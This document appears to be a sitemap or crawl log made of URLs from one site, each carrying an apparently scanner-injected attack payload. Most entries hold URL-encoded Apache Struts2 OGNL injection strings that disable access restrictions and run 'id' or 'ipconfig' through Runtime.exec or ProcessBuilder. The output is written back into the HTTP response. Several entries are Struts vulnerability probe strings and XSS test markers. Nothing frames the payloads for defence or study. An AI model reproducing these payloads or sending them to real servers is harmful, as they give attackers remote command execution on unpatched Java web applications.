http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=osm26129%c0%beo1%c0%bco2a%90bcoem47828 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=ey86a? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=5wcg6 0.5 2024-04-15 